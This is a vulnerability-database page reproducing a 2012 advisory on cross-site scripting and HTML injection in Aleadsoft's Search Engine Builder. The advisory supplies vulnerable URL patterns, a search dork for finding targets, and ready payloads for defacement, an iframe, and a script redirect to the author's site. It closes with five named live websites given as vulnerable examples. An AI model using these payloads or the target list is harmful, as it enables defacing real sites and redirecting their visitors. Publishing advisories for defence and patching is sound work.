Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Search Engine Builder Cross Site Scripting

🗓️ 20 Feb 2012 00:00:00Reported by ITTIHACKType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 31 Views

Search Engine Builder XSS Injection Vulnerabilities Aleadsoft software allows creation of search engines for Windows IIS servers with potential HTML/XSS injection vulnerabilities

Code
`Search Engine Builder (XSS/HTML) Injection Vulnerabilities  
  
Software : Search Engine Builder   
Date : 2/20/2012   
Vendor : http://www.aleadsoft.com   
Get App. : http://www.aleadsoft.com/SearchMakerSetup.exe   
Platform : Windows  
Language : ASP   
Tested on: Windows   
Dork : "Powered by Search Engine Builder"   
Author : ITTIHACK   
Home : http://ittihack.com   
  
Description:  
Aleadsoft develops both GUI software and web-application to Create search engine for your own website.  
All these softwares run on Windows system and IIS servers, including WIN 9x/ME/NT/2000/XP/2003/Vista/Win7.   
  
  
Exploit: Inject your HTML/XSS codes in the search box;  
  
http://site/path/search.php?searWords=[Evil]  
http://site/path/searchsimple.asp?searWords=[Evil]  
  
Demo :  
Inject the codes below in the search box (Examples):  
  
1) HTML:  
  
<center><b><h1><span style='color:yellow;'>ITTIHACK</span></h1></b></p></center>  
<iframe src="http://www.ittihack.com"></iframe>   
  
2) XSS :  
  
<script>alert("XSS")</script>  
<script>window.location="http://ittihack.com"</script>"  
  
  
http://laramiecounty.com/_departments/_sheriff/search.asp  
http://abytel.com/search/searchsimple.asp  
http://ottawamalayali.ca/SearchEngine/search.php  
http://www.h-e-r-m-e-s.org/search.asp  
http://www.broseley.org.uk/search.asp  
  
  
May allah have mercy on the martyrs of Syria  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Feb 2012 00:00Current
7.4High risk
Vulners AI Score7.4
search engine builderxsshtml injectionaleadsoftwindowsiisvulnerabilities
31